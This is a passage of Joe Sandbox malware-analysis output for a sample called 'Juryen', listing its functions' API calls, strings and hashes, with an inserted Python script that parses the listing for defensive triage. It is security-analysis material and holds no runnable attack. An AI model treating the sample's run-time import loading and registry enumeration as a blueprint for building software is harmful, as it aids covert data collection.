                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memset
                                                                    • String ID: gj
                                                                    • API String ID: 438689982-4203073231
                                                                    • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                    • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                    • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                    • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                    APIs
                                                                    • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                    • API String ID: 3510742995-2446657581
                                                                    • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                    • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                    • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                    • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                    • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                    • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                    • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                    • memset.MSVCRT ref: 00405ABB
                                                                    • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                    • SetFocus.USER32(?), ref: 00405B76
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$FocusItemmemset
                                                                    • String ID:
                                                                    • API String ID: 4281309102-0
                                                                    • Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                    • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                    • Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                    • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _snwprintfwcscat
                                                                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                    • API String ID: 384018552-4153097237
                                                                    • Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                    • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                    • Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                    • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$CountInfomemsetwcschr
                                                                    • String ID: 0$6
                                                                    • API String ID: 2029023288-3849865405
                                                                    • Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                    • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                    • Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                    • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                    APIs
                                                                      • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                    • memset.MSVCRT ref: 00405455
                                                                    • memset.MSVCRT ref: 0040546C
                                                                    • memset.MSVCRT ref: 00405483
                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$memcpy$ErrorLast
                                                                    • String ID: 6$\
                                                                    • API String ID: 404372293-1284684873
                                                                    • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                    • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                    • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                    • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                    APIs
                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                    • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                    • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                    • wcscpy.MSVCRT ref: 0040A0D9
                                                                    • wcscat.MSVCRT ref: 0040A0E6
                                                                    • wcscat.MSVCRT ref: 0040A0F5
                                                                    • wcscpy.MSVCRT ref: 0040A107
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                    • String ID:
                                                                    • API String ID: 1331804452-0
                                                                    • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                    • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                    • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                    • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                    APIs
                                                                      • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                    • String ID: advapi32.dll
                                                                    • API String ID: 2012295524-4050573280
                                                                    • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                    • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                    • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                    • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
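The block above is the kind of entry worth pulling out of this listing by machine rather than by eye: a body that calls GetProcAddress five times after a subcall does GetSystemDirectoryW plus LoadLibraryW, with "advapi32.dll" as the only string, is resolving its imports at run time. The following Python is an added example and is not part of the Joe Sandbox report or of its IDA plugin. It parses the "APIs" and "Similarity" bullets of this listing into per-function records and applies two triage heuristics of the editor's own (a threshold on direct GetProcAddress calls, and substring matching over the String ID field); the sample text is excerpted verbatim from two of the blocks on this page, and the threshold value is an assumption.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: two function blocks excerpted verbatim from the Joe Sandbox IDA Plugin
# listing for this report (process 0000000D, image base 0x400000); the repeated
# "Memory Dump Source" lines are omitted because they carry no per-function data.
SAMPLE = r"""APIs
  • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
• GetProcAddress.KERNEL32(?,00000000), ref: 00404398
• GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
• GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
• GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
• GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
Strings
Similarity
• API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
• String ID: advapi32.dll
• Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
APIs
Similarity
• API ID: memset
• String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
• Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
"""

# One "APIs" bullet: optional "Part of subcall function <addr>:" prefix, then
# <api>.<module>, optional "(args)", then "ref: <call-site addr>".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$")
# Similarity fields kept; "API String ID" intentionally does not match this pattern.
FIELD_RE = re.compile(r"^\s*•\s*(API ID|String ID|Opcode ID):\s*(.*)$")


@dataclass(frozen=True)
class Call:
    api: str
    module: str
    args: tuple
    ref: str                   # call-site address
    subcall_of: Optional[str]  # callee address for "Part of subcall" lines, else None


@dataclass
class FunctionRecord:
    opcode_id: str = ""
    api_ids: List[str] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    calls: List[Call] = field(default_factory=list)


def parse_listing(text: str) -> List[FunctionRecord]:
    """Start a new record at each 'APIs' header; collect its calls and Similarity fields."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        m = CALL_RE.match(line) if cur else None
        if m:
            args = tuple(a for a in (m["args"] or "").split(",") if a)
            cur.calls.append(Call(m["api"], m["mod"], args, m["ref"], m["sub"]))
            continue
        m = FIELD_RE.match(line) if cur else None
        if m:
            name, value = m.group(1), m.group(2).strip()
            parts = [v for v in value.split("$") if v]
            if name == "Opcode ID":
                cur.opcode_id = value
            elif name == "API ID":
                cur.api_ids = parts
            else:
                cur.strings = parts
    return records


def direct_calls(rec: FunctionRecord) -> List[str]:
    """API names called from the function body itself (subcall lines excluded)."""
    return [c.api for c in rec.calls if c.subcall_of is None]


def dynamic_import_resolvers(records, min_calls: int = 3) -> List[str]:
    """Triage heuristic added here (not Joe Sandbox's): several direct GetProcAddress
    calls in one body mean imports are resolved at run time, so the PE import table
    understates what the function uses. The threshold of 3 is an assumption."""
    return [r.opcode_id for r in records
            if direct_calls(r).count("GetProcAddress") >= min_calls]


def string_hits(records, needles) -> dict:
    """Opcode IDs whose String ID field contains each needle (case-insensitive)."""
    return {n: [r.opcode_id for r in records
                if n.lower() in " ".join(r.strings).lower()] for n in needles}


if __name__ == "__main__":
    recs = parse_listing(SAMPLE)
    print("runtime import resolution:", dynamic_import_resolvers(recs))
    print(string_hits(recs, ["advapi32", "GROUP BY", "CREATE TABLE"]))
```

Run against the full listing, `string_hits` with needles such as "CREATE TABLE", "GROUP BY" and "Shell Folders" groups the SQL-engine functions and the registry-walking function in one pass, and `dynamic_import_resolvers` lists the bodies whose real API use the import table will not show. Both are only a triage aid; the Opcode ID is what ties a hit back to the block in the report.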
                                                                    APIs
                                                                    Strings
                                                                    • <%s>, xrefs: 004100A6
                                                                    • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                    • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$_snwprintf
                                                                    • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                    • API String ID: 3473751417-2880344631
                                                                    • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                    • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                    • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                    • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: wcscat$_snwprintfmemset
                                                                    • String ID: %2.2X
                                                                    • API String ID: 2521778956-791839006
                                                                    • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                    • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                    • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                    • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _snwprintfwcscpy
                                                                    • String ID: dialog_%d$general$menu_%d$strings
                                                                    • API String ID: 999028693-502967061
                                                                    • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                    • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                    • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                    • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                    APIs
                                                                    • strlen.MSVCRT ref: 00408DFA
                                                                      • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                    • memset.MSVCRT ref: 00408E46
                                                                    • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                    • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                    • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                    • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                    • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memsetstrlen
                                                                    • String ID:
                                                                    • API String ID: 2350177629-0
                                                                    • Opcode ID: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                    • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                    • Opcode Fuzzy Hash: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                    • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                    • API String ID: 2221118986-1606337402
                                                                    • Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                    • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                    • Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                    • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                    APIs
                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                    • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                    • memset.MSVCRT ref: 00408FD4
                                                                    • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                    • memset.MSVCRT ref: 00409042
                                                                    • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                      • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                    • String ID:
                                                                    • API String ID: 265355444-0
                                                                    • Opcode ID: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                    • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                    • Opcode Fuzzy Hash: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                    • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                    APIs
                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                      • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                      • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                    • memset.MSVCRT ref: 0040C439
                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                    • _wcsupr.MSVCRT ref: 0040C481
                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                    • memset.MSVCRT ref: 0040C4D0
                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                    • String ID:
                                                                    • API String ID: 4131475296-0
                                                                    • Opcode ID: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
                                                                    • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                    • Opcode Fuzzy Hash: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
                                                                    • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004116FF
                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
